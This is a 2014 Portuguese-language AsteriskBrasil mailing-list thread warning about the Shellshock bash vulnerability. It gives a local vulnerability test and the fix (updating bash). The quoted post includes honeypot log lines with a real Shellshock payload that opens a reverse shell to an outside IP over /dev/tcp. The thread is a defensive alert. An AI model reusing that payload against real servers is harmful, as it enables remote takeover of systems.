[AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock

Rafael dos Santos Saraiva rafaelsnsa em gmail.com
Sexta Setembro 26 20:59:21 BRT 2014


Boa Noite Flavio

Segue uma dica pra verificar se o servidor está vulnerável:
env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

*Dica divulgada pela DigitalOcean.

Pra resolver é só realizar update do bash: yum update bash





[image: Sua Foto] <rafaelsnsa em gmail.com>Rafael S. SaraivaPorto Alegre - RS
| Mobile:  (51) 8174-7956
<http://br.linkedin.com/pub/rafael-saraiva/52/aab/230>
<https://plus.google.com/u/0/+RafaelSaraivaRS>

Em 26 de setembro de 2014 15:11, Flavio Goncalves <flavio em voffice.com.br>
escreveu:

> Caros amigos,
>
> A vulnerabilidade do bash conhecida como shellshock foi descoberta
> recentemente e divulgada ontem. Ela permite a execução de comandos remotos
> nos servidores através dos servidores http.  Os nossos honeypots já estão
> detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo
> em atualizar os servidores e evitem fraudes.
>
> Exemplo do que estamos detectando neste exato momento:
>
> [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;};
> /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
> [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0"
> 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/
> 195.225.34.14/3333 0>&1'"
>
> Att,
>
> Flavio E. Goncalves
>
>
> _______________________________________________
> WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto
> e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de
> BRINDES.
> Garanta a sua vaga e saiba mais em: www.workoffee.com.br
> _______________________________________________
> ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia
> IP .
> Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
> Banco de Canais Analógicos  – Appliance Asterisk Acesse www.aligera.com.br
> _______________________________________________
> DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e
> FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
> Construa soluções de PABX IP com produtos DigiVoice - visite
> www.digivoice.com.br
> _______________________________________________
> Para remover seu email desta lista, basta enviar um email em branco para
> asteriskbrasil-unsubscribe em listas.asteriskbrasil.org
>
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: <http://asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20140926/67fcc1ee/attachment.html>


Mais detalhes sobre a lista de discussão AsteriskBrasil